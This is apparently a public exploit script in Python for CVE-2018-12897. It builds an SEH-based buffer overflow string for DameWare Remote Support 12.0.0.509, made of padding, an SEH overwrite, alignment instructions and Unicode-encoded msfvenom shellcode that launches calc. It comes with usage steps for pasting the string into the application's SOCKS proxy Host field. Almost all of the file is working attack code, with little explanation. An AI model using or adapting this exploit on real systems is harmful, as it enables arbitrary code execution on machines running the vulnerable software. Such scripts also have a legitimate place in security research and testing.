Share
#!/usr/bin/env python 
# Author: Xavi Beltran 
# Date: 11/07/2019 
# Description: 
# SEH based Buffer Overflow 
# DameWare Remote Support V. 12.0.0.509 
# CVE-2018-12897 
 
# Contact: xavibeltran@protonmail.com 
# Webpage: https://xavibel.com 
# Tested on: Windows XP SP3 ESP 
 
# Credit for Adam Jeffreys from Nettitude! :) 
 
# Usage: 
# Right click on a host >> AMT >> AMT Settings dialog 
# Mark "Use SOCKS proxy" box 
# Paste the string in the Host field 
 
junk = "\x41" * 1672 
 
# Unicode compatible padding 
nseh = "\x61\x43" 
 
# 007A007B - POP POP RET 
seh = "\x7B\x7A" 
 
align = "" 
align += "\x05\x20\x11" # add eax,0x11002000 
align += "\x71" # Venetian Padding 
align += "\x2d\x19\x11" # sub eax,0x11001900 
align += "\x71" # Venetian Padding 
align += "\x50" # push eax 
align += "\x71" # Venetian Padding 
align += "\xC3" # RETN 
 
padding = "\x41" * 11 
 
junk2 = "\x41" * 870 
junk3 = "\x41" * 2014 
 
# msfvenom -p windows/exec CMD=calc -f raw > shellcode.raw 
# ./alpha2 eax --unicode --uppercase < shellcode.raw 
# 508 bytes 
shellcode = "PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBKLYX4BM0M0KPQP4IZEP17PQTDKPPNPTK1BLLDK1BLTTKT2MXLOVWPJMV01KO6LOLS13LM2NLMPWQHOLMM1WWK2KBPR27TKPRLP4K0JOLTK0LN1D8K3OXKQJ1R1TKPYMPM1HS4KPILXYSOJQ9DKOD4KM1XVNQKO6LGQ8OLMM1WWP89PRUZVLCSMKHOKSMMT2UJD1HDKQHNDKQJ31VTKLL0K4K1HMLM1J3DKKTTKM1HP3YQ4O4ND1K1KQQR9PZ0QKOYPQOQOQJDKLRZKTM1MRJM1DMCUH2KPKPKPPPQXP1TKBOU7KOHUWKL07EFB0V38W6V5WMUMKOJ5OLM63LLJ3PKKIP2UKUWK17MCBRROQZM0B3KOZ51S1Q2LQSKPA" 
 
 
crash = junk + nseh + seh + padding + align + junk2 + shellcode + junk3 
 
print(crash)